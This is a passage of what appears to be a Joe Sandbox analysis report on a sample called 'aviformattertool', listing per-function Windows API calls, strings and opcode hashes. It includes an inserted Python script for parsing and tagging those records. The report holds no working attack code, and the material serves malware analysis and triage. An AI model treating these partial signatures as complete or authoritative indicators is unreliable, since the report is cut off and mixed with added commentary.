• RtlEnterCriticalSection.NTDLL(?), ref: 02A1E118
• InterlockedIncrement.KERNEL32(02A45170), ref: 02A1E13D
• RtlLeaveCriticalSection.NTDLL(?), ref: 02A1E152
  • Part of subcall function 02A127F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02A1284E
Yara matches
Similarity
• API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
Uniqueness
Uniqueness Score: -1.00%

APIs
• _malloc.LIBCMT ref: 02A30330
  • Part of subcall function 02A22F2C: __FF_MSGBANNER.LIBCMT ref: 02A22F43
  • Part of subcall function 02A22F2C: __NMSG_WRITE.LIBCMT ref: 02A22F4A
  • Part of subcall function 02A22F2C: RtlAllocateHeap.NTDLL(007D0000,00000000,00000001), ref: 02A22F6F
• _free.LIBCMT ref: 02A30343
Yara matches
Similarity
• API ID: AllocateHeap_free_malloc
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 02A121DA
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A121ED
• TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02A12224
• TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02A12237
• TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A12261
  • Part of subcall function 02A12341: InterlockedExchange.KERNEL32(?,00000001), ref: 02A12350
  • Part of subcall function 02A12341: InterlockedExchange.KERNEL32(?,00000001), ref: 02A12360
  • Part of subcall function 02A12341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A12370
  • Part of subcall function 02A12341: GetLastError.KERNEL32 ref: 02A1237A
Yara matches
Similarity
• API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 02A1229D
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A122B0
• TlsGetValue.KERNEL32 ref: 02A122E7
• TlsSetValue.KERNEL32(?), ref: 02A12300
• TlsSetValue.KERNEL32(?,?,?), ref: 02A1231C
  • Part of subcall function 02A12341: InterlockedExchange.KERNEL32(?,00000001), ref: 02A12350
  • Part of subcall function 02A12341: InterlockedExchange.KERNEL32(?,00000001), ref: 02A12360
  • Part of subcall function 02A12341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A12370
  • Part of subcall function 02A12341: GetLastError.KERNEL32 ref: 02A1237A
Yara matches
Similarity
• API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02A1B0E5: __EH_prolog.LIBCMT ref: 02A1B0EA
• __CxxThrowException@8.LIBCMT ref: 02A1BCAF
  • Part of subcall function 02A244DA: RaiseException.KERNEL32(?,?,02A1FADF,?,?,?,?,?,?,?,02A1FADF,?,02A40F68,?), ref: 02A2452F
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02A41D84,?,00000001), ref: 02A1BCC5
• InterlockedExchange.KERNEL32(?,00000001), ref: 02A1BCD8
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02A41D84,?,00000001), ref: 02A1BCE8
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A1BCF6
Yara matches
Similarity
• API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
Uniqueness
Uniqueness Score: -1.00%

APIs
• InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02A12432
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02A12445
• RtlEnterCriticalSection.NTDLL(?), ref: 02A12454
• InterlockedExchange.KERNEL32(?,00000001), ref: 02A12469
• RtlLeaveCriticalSection.NTDLL(?), ref: 02A12470
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 747265849-0
                                                                                                                                                          • Opcode ID: 3f8ce8d7d2c679bd40f2f2b78b5e6c56cc05e2a54b2c08c513323de14b8160ce
                                                                                                                                                          • Instruction ID: 9fd1bc365eea7904328a78c46fd79ed3f038912a24429cced2c9b67fd854b819
                                                                                                                                                          • Opcode Fuzzy Hash: 3f8ce8d7d2c679bd40f2f2b78b5e6c56cc05e2a54b2c08c513323de14b8160ce
                                                                                                                                                          • Instruction Fuzzy Hash: 7BF030B2680214BBD7049BA0EE8AFD6B72DFB46711F804411F701D6480DF71E921CBA1
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 02A11ED2
                                                                                                                                                          • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02A11EEA
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02A11EF9
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02A11F0E
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02A11F15
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 830998967-0
                                                                                                                                                          • Opcode ID: 0c97f504b60c584d2c87c7fbaf43457f8232a5516b2a598a3e0502762e0e73c6
                                                                                                                                                          • Instruction ID: 9d9ed496faa33ddf3198b79aa554e2ef0177baa85e8c5dc2e910948abebbaa5d
                                                                                                                                                          • Opcode Fuzzy Hash: 0c97f504b60c584d2c87c7fbaf43457f8232a5516b2a598a3e0502762e0e73c6
                                                                                                                                                          • Instruction Fuzzy Hash: EEF01DB2541609BBD700AFA1ED88FD6B72DFF05351F000416F60186440DF71E626CBA0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 02A19A59: __EH_prolog.LIBCMT ref: 02A19A5E
                                                                                                                                                            • Part of subcall function 02A19A59: _Allocate.LIBCPMT ref: 02A19AB5
                                                                                                                                                            • Part of subcall function 02A19A59: _memmove.LIBCMT ref: 02A19B0C
                                                                                                                                                          • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02A20922
                                                                                                                                                          • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02A2092A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateErrorFormatH_prologLastMessage_memmove
                                                                                                                                                          • String ID: Unknown error$invalid string position
                                                                                                                                                          • API String ID: 1017912131-1837348584
                                                                                                                                                          • Opcode ID: c773ad565ae59182095142a2d7e09b13276888ee2d9c729148d784462f24aa1a
                                                                                                                                                          • Instruction ID: 1ab83336d2c710b1bd1dc561ffd58f7991d20a14e40f3736b2abcd12103837a9
                                                                                                                                                          • Opcode Fuzzy Hash: c773ad565ae59182095142a2d7e09b13276888ee2d9c729148d784462f24aa1a
                                                                                                                                                          • Instruction Fuzzy Hash: 9351BD706083419FEB14DF29C890B2FBBE4BBA8754F50092DF482A7691DB71E548CB92
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID: invalid string position$string too long
                                                                                                                                                          • API String ID: 4104443479-4289949731
                                                                                                                                                          • Opcode ID: 2b1faad9396fca001325e33335d911a2105634967858f42e202bb5ea1d226e5a
                                                                                                                                                          • Instruction ID: c8d146552695297c4797e9b04c6d9ac99a2c5dbf129c0ebd1cdb1da779a3adf0
                                                                                                                                                          • Opcode Fuzzy Hash: 2b1faad9396fca001325e33335d911a2105634967858f42e202bb5ea1d226e5a
                                                                                                                                                          • Instruction Fuzzy Hash: 7141A035300304EFEB24DF6DD984A5ABBAAEF41774B10092DE856CB681CF74E844CB90
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 02A130C3
                                                                                                                                                          • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02A13102
                                                                                                                                                          • _memcmp.LIBCMT ref: 02A13141
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressErrorLastString_memcmp
                                                                                                                                                          • String ID: 255.255.255.255
                                                                                                                                                          • API String ID: 1618111833-2422070025
                                                                                                                                                          • Opcode ID: 259e3024bb84dbee00f50a9167d04d83f9b75289bf9fda709db2930819e59599
                                                                                                                                                          • Instruction ID: 40ace36490fc30c5c6937f99e968b4215f391853554aace2fd65bb056af69511
                                                                                                                                                          • Opcode Fuzzy Hash: 259e3024bb84dbee00f50a9167d04d83f9b75289bf9fda709db2930819e59599
                                                                                                                                                          • Instruction Fuzzy Hash: B831B371A003199FDF209F64C980B6EB7B6BF45334F1045AAE86597280DF719949CB90
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A1CD29
                                                                                                                                                            • Part of subcall function 02A1D2E7: std::exception::exception.LIBCMT ref: 02A1D314
                                                                                                                                                            • Part of subcall function 02A1DAFD: __EH_prolog.LIBCMT ref: 02A1DB02
                                                                                                                                                            • Part of subcall function 02A23ACC: _malloc.LIBCMT ref: 02A23AE4
                                                                                                                                                            • Part of subcall function 02A1D344: __EH_prolog.LIBCMT ref: 02A1D349
                                                                                                                                                          Strings
                                                                                                                                                          • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02A1CD5F
                                                                                                                                                          • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02A1CD66
                                                                                                                                                          • x}, xrefs: 02A1CDB8, 02A1CDE0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prolog$_mallocstd::exception::exception
                                                                                                                                                          • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)$x}
                                                                                                                                                          • API String ID: 1953324306-107246763
                                                                                                                                                          • Opcode ID: 4f92a8d73015956d54967d6cc1512773e74dcbed6704d93ae2a8f85fbd377c09
                                                                                                                                                          • Instruction ID: ad83fbf54c5aec78e9f88bb3be8109e55dd1747bfb4311fd5cb24c51b563998d
                                                                                                                                                          • Opcode Fuzzy Hash: 4f92a8d73015956d54967d6cc1512773e74dcbed6704d93ae2a8f85fbd377c09
                                                                                                                                                          • Instruction Fuzzy Hash: A4217E71E812549ADF14EFA8DA54AADFBB9EF44720F04409DE805A7280CF709A48CF51
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A11F5B
                                                                                                                                                          • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02A11FC5
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 02A11FD2
                                                                                                                                                            • Part of subcall function 02A11712: __EH_prolog.LIBCMT ref: 02A11717
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                                                                                          • String ID: iocp
                                                                                                                                                          • API String ID: 998023749-976528080
                                                                                                                                                          • Opcode ID: be36a442aaeb1e5273d44c2938ff9dee8da6befb435d15de715cb5ac3fc609ae
                                                                                                                                                          • Instruction ID: b50987a762e7a07ebe6019c003c3c457ea826e9e5b23b4e58b66f8f17642db8f
                                                                                                                                                          • Opcode Fuzzy Hash: be36a442aaeb1e5273d44c2938ff9dee8da6befb435d15de715cb5ac3fc609ae
                                                                                                                                                          • Instruction Fuzzy Hash: 8821C4B1901B449BC7219F6A854455BFBF8EF95720B108A1FE4A683A50DBB0A604CF91
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%
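
Each record above describes one function of the unpacked sample; a full report of this kind holds hundreds of them, and the networking-related ones (the WS2_32 address parsing against "255.255.255.255", the I/O completion port setup tagged "iocp") are the ones worth reading first. The following Python is an added triage example, not Joe Sandbox code and not part of this report's tooling: it parses records in the layout used above and tags each function with a coarse capability label so the interesting ones can be pulled out of a text export. The FunctionRecord class, the parse_records function and the capability table are this example's own assumptions; the embedded sample is two abridged records copied from this page.

```python
"""Triage helper for Joe Sandbox IDA-plugin function records (added example,
not Joe Sandbox code). Parses the per-function layout shown above and tags each
function with a coarse capability label; class, function names and the
capability table are this example's own assumptions."""
import re
from dataclasses import dataclass, field

# Constructed sample: two abridged records copied from this page (leading
# whitespace of the rendered report and the Memory Dump / Yara lines dropped).
SAMPLE_REPORT = """\
APIs
• WSASetLastError.WS2_32(00000000), ref: 02A130C3
• WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02A13102
• _memcmp.LIBCMT ref: 02A13141
Strings
Similarity
• API ID: AddressErrorLastString_memcmp
• String ID: 255.255.255.255
• API String ID: 1618111833-2422070025
• Opcode ID: 259e3024bb84dbee00f50a9167d04d83f9b75289bf9fda709db2930819e59599
• Instruction Fuzzy Hash: B831B371A003199FDF209F64C980B6EB7B6BF45334F1045AAE86597280DF719949CB90
Uniqueness
Uniqueness Score: -1.00%
APIs
• __EH_prolog.LIBCMT ref: 02A11F5B
• CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02A11FC5
• GetLastError.KERNEL32(?,00000000), ref: 02A11FD2
  • Part of subcall function 02A11712: __EH_prolog.LIBCMT ref: 02A11717
Strings
Similarity
• API ID: H_prolog$CompletionCreateErrorLastPort
• String ID: iocp
• API String ID: 998023749-976528080
• Opcode ID: be36a442aaeb1e5273d44c2938ff9dee8da6befb435d15de715cb5ac3fc609ae
• Instruction Fuzzy Hash: 8821C4B1901B449BC7219F6A854455BFBF8EF95720B108A1FE4A683A50DBB0A604CF91
Uniqueness
Uniqueness Score: -1.00%
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR"
API_LINE = re.compile(r"^•\s+(?P<name>[\w:@]+)\.(?P<module>[A-Z0-9_]+)"
                      r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SUBCALL_LINE = re.compile(r"^•\s+Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*(?P<rest>.*)$")
FIELD_LINE = re.compile(r"^•\s+(?P<key>API String ID|API ID|String ID|Opcode ID|Instruction ID|"
                        r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<value>.*)$")

# Assumed capability table: this example's heuristic, not a sandbox signature.
CAPABILITY_BY_API = {"WSAStringToAddressA": "winsock/address-parsing",
                     "CreateIoCompletionPort": "iocp", "PostQueuedCompletionStatus": "iocp",
                     "FormatMessageA": "error-text"}
CAPABILITY_BY_MODULE = {"WS2_32": "winsock"}


@dataclass
class FunctionRecord:
    fields: dict = field(default_factory=dict)    # Opcode ID, API ID, String ID, ...
    apis: list = field(default_factory=list)      # direct calls: (name, module, ref)
    subcalls: list = field(default_factory=list)  # calls inside callees: (caller, name, module)

    @property
    def strings(self):
        # The report joins several strings with '$'; an empty String ID means none.
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    @property
    def api_string_id(self):
        # As seen on this page: "<api hash>-<string hash>", second part 0 when no strings.
        api_part, string_part = self.fields["API String ID"].split("-")
        return int(api_part), int(string_part)

    def capabilities(self):
        # Only direct calls count, so a callee's IOCP use is not charged to the caller.
        labels = set()
        for name, module, _ in self.apis:
            labels.update(x for x in (CAPABILITY_BY_API.get(name), CAPABILITY_BY_MODULE.get(module)) if x)
        return sorted(labels)


def parse_records(text):
    """Split report text into FunctionRecords; every record starts at an 'APIs' line."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
        elif current is None or not line.startswith("•"):
            continue  # section labels ("Strings", "Similarity", ...) and blank lines
        elif (sub := SUBCALL_LINE.match(line)):
            inner = API_LINE.match("• " + sub.group("rest"))
            if inner:
                current.subcalls.append((sub.group("caller"), inner.group("name"), inner.group("module")))
        elif (api := API_LINE.match(line)):
            current.apis.append((api.group("name"), api.group("module"), api.group("ref")))
        elif (fld := FIELD_LINE.match(line)):
            current.fields[fld.group("key")] = fld.group("value").strip()
    return records


if __name__ == "__main__":
    for rec in parse_records(SAMPLE_REPORT):
        print(rec.fields.get("Opcode ID", "")[:12], rec.capabilities(), rec.strings)
```

Point it at a plain-text export of the report and filter on capabilities(); "Part of subcall function" lines are kept in a separate list so that an API reached only through a callee is not attributed to the function whose record it appears in, which matters when the same __EH_prolog or _malloc subcall shows up under dozens of callers.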

                                                                                                                                                          APIs
                                                                                                                                                          • _malloc.LIBCMT ref: 02A23AE4
  • Part of subcall function 02A22F2C: __FF_MSGBANNER.LIBCMT ref: 02A22F43
  • Part of subcall function 02A22F2C: __NMSG_WRITE.LIBCMT ref: 02A22F4A
  • Part of subcall function 02A22F2C: RtlAllocateHeap.NTDLL(007D0000,00000000,00000001), ref: 02A22F6F
• std::exception::exception.LIBCMT ref: 02A23B02
• __CxxThrowException@8.LIBCMT ref: 02A23B17
  • Part of subcall function 02A244DA: RaiseException.KERNEL32(?,?,02A1FADF,?,?,?,?,?,?,?,02A1FADF,?,02A40F68,?), ref: 02A2452F
Strings
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
• String ID: bad allocation
• API String ID: 3074076210-2104205924
• Opcode ID: 12af6f2de27304bd89a8b130a69a0c9eb7d79b13747364fba3a0b65a06884e67
• Instruction ID: cf76037e71d92be697cf36e8071e0af65e468d57451c340bad5c76ccdf62f078
• Instruction Fuzzy Hash: AFE0653454022EAADF05FF68CD41AAFB77AAF01310F5046E6EC14A5590EF76DA1CDAD0
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 02A137B6
• __localtime64.LIBCMT ref: 02A137C1
  • Part of subcall function 02A22580: __gmtime64_s.LIBCMT ref: 02A22593
• std::exception::exception.LIBCMT ref: 02A137D9
  • Part of subcall function 02A22453: std::exception::_Copy_str.LIBCMT ref: 02A2246C
  • Part of subcall function 02A1A4A8: __EH_prolog.LIBCMT ref: 02A1A4AD
  • Part of subcall function 02A1A4A8: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02A1A4BC
  • Part of subcall function 02A1A4A8: __CxxThrowException@8.LIBCMT ref: 02A1A4DB
Strings
• could not convert calendar time to UTC time, xrefs: 02A137CE
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
• String ID: could not convert calendar time to UTC time
• API String ID: 1963798777-2088861013
• Opcode ID: 530376913a9ce4e77a5cfaff8cc1d8e28bf0786272e3f3b3f9a07f0e896c6dd0
• Instruction ID: b043b03752d2690c31553916a301e586fd05334940270e98414b098dc72dde60
• Instruction Fuzzy Hash: DCE06DB1D4020A9BCB01EF98DA147EEB779EF04314F408599E825A6140EF3856198F94
Uniqueness
Uniqueness Score: -1.00%

APIs
• HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032A0), ref: 00403B29
• VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032A0), ref: 00403B4D
• VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032A0), ref: 00403B67
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032A0), ref: 00403C28
• HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032A0), ref: 00403C3F
Memory Dump Source
• Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
Similarity
• API ID: AllocVirtual$FreeHeap
• String ID:
• API String ID: 714016831-0
• Opcode ID: 6a0377e224db4ae02a06dd950b66bd3eac28a76e8822154944f4586344a6cd6a
• Instruction ID: 5b32f38fccd05926e46b045a885d3edb078ef3cc8d07faf24e937b41c291ab55
• Instruction Fuzzy Hash: A73112719447029BE3208F24DD05B22BBA8E74475AF00413AE166BB3D2E778B801874D
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: AdjustPointer_memmove
• String ID:
• API String ID: 1721217611-0
• Opcode ID: 25ac03582b394c7a240c6be101f736b6775926deb7717aebdf0046bc37aa5e2d
• Instruction ID: 242d87bc0ec5b959a251bf91df9a05489f6107ce717f223576847b8f04ff56d9
• Instruction Fuzzy Hash: 3E41C4362843126AEB299F1CD980B7F77EB9F05734F15001FE846C65D0EF21E588CA51
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02A14149), ref: 02A2133F
  • Part of subcall function 02A13FDC: __EH_prolog.LIBCMT ref: 02A13FE1
  • Part of subcall function 02A13FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02A13FF3
• CloseHandle.KERNEL32(00000000), ref: 02A21334
• CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02A14149), ref: 02A21380
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02A14149), ref: 02A21451
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: CloseHandle$Event$CreateH_prolog
• String ID:
• API String ID: 2825413587-0
• Opcode ID: 2ef92a665f9590787cc8095520dd0c06e9b690a1df570efc70966d00b32f087e
• Instruction ID: 5a31aedc35ae870105871ff00c55fbe702710cf67562abd7258a46bae7822408
• Instruction Fuzzy Hash: 9A51AEB16003559BDF21CF2CC98479AB7E5BF48328F194668F86D97281DF35D809CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
• Opcode ID: a9937a16b76c58c94b28bf15a68adb4139bcec099db716b101ad8f61a228703e
• Instruction ID: a793c1bd53eafeddaaa882907ea861fd0622f433c35d1441c683035f2317fef9
• Instruction Fuzzy Hash: 1541B275B00726EBDF18CF6DC8D05AE77B6EF42364B1481ADE8158B250DF78D9498B40
Uniqueness
Uniqueness Score: -1.00%

APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02A2FECB
• __isleadbyte_l.LIBCMT ref: 02A2FEF9
• MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 02A2FF27
• MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 02A2FF5D
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 356e94b0a83ae8b41172d3b9d33a8a7299057d8e5bfd5d9a4ba8a94b721613b4
• Instruction ID: 490b134e3e87b7be1a8e28b03b78ead517e3595290fdf182c2906aa5bf3b67e6
• Instruction Fuzzy Hash: 9231C031600266AFDB22CF29CC84BAABBB6BF42314F154029E864C7590DF31D859DB90
Uniqueness
Uniqueness Score: -1.00%

APIs
• htons.WS2_32(?), ref: 02A13DA2
  • Part of subcall function 02A13BD3: __EH_prolog.LIBCMT ref: 02A13BD8
  • Part of subcall function 02A13BD3: std::bad_exception::bad_exception.LIBCMT ref: 02A13BED
• htonl.WS2_32(00000000), ref: 02A13DB9
• htonl.WS2_32(00000000), ref: 02A13DC0
• htons.WS2_32(?), ref: 02A13DD4
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
• String ID:
• API String ID: 3882411702-0
• Opcode ID: ad81da06403020c93c07576728c5cabae21e2f7e7bdeba715ea7802c8cf01234
• Instruction ID: abb039b6397520880b92a74b10820bd71af5a06853d27dca45e4ba95dee276c9
• Instruction Fuzzy Hash: 2C117076900209EBCF019FA4D985A6AB7B9FF09324B008496FD04DF215EA71DA15CBA1
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02A123D0
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02A123DE
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02A12401
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02A12408
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
